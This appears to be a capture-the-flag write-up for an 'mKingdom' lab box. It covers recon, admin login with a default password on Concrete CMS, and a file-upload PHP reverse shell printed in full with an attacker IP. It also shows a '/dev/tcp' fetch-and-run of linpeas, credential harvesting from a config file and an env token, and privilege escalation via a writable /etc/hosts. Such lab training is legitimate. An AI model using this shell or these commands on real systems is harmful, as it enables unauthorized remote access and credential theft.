mKingdom

Reconnaissance
nmap -sC -sV -Pn -T4 10.10.x.x

I see that Port 85 work web service http://10.10.x.x:85/

I use gobuster to Fuzzing dir
gobuster dir -u http://10.10.112.62:85/ --wordlist=/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

i Found /app (Status: 301) [Size: 312] [--> http://10.10.112.62:85/app/
]
when scroll down i found login page and i use Wayyplazer found CMS Concrete => V8.5.2
File Upload code
There’s an existing RCE vulnerability in Concrete CMS 8.5.2.
i use Revers shell online https://www.revshells.com/
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.21.32.157';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

when scroll in web site i found username "admin" in /blog

I tried to login with ‘admin
’ as username and random passwords, and to my surprise, ‘password
’ worked!
Initial Access
According to instructions, I navigated to System & Settings-> Allowed file types, and added ‘.php’ in the allowed file types.

Then I went to Files -> File Manager and uploaded a php reverse shell. I started a Netcat listener on my attacking machine. After uploading the shell, I accessed it from the link provided on the website.

I using reverse shell nc
nc -nvlp 9001
in click URL to File

Priv Esc
To Upgrade the tty
python -c 'import pty;pty.spawn("/bin/bash");'
ctrl z
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

I will try Useing Best tool to look for Linux local privilege escalation vectors: LinPEAS
sudo nc -lvnp 443 < linpeas.sh #Host
cat < /dev/tcp/10.21.32.157/443 | sh #Victim

i found DB.php

<?php
return [
'default-connection' => 'concrete',
'connections' => [
'concrete' => [
'driver' => 'c5_pdo_mysql',
'server' => 'localhost',
'database' => 'mKingdom',
'username' => 'toad',
'password' => 'toadisthebest',
'character_set' => 'utf8',
'collation' => 'utf8_unicode_ci',
],
],
];

I logged in as toad. After a bit of looking around, I listed the current environment variables using ‘env’, and I found a PWD_token.

echo "aWthVGVOVEFOdEVTCg==" | base64 -d
or
base64 -d <<< aWthVGVOVEFOdEVTCg==
user : mario
pass : ikaTeNTANtES

But i don't cat the flag

i will move file to /tmp

I ran linpeas again as mario, and found that /etc/hosts is writable

curl mkingdom.thm:85/app/castle/application/counter.sh
I modified the /etc/hosts file to add my attacking machine IP and mkingdom.thm as the corresponding hostname. Then I created the folder path /app/castle/application on my attacking machine and placed counter.sh there with a reverse shell payload.


Exploit Used
Reverse shell (File Upload) File Upload code
Tools Used
Nmap
nc
gobuseter
linpeas.sh
Other Resources
Last updated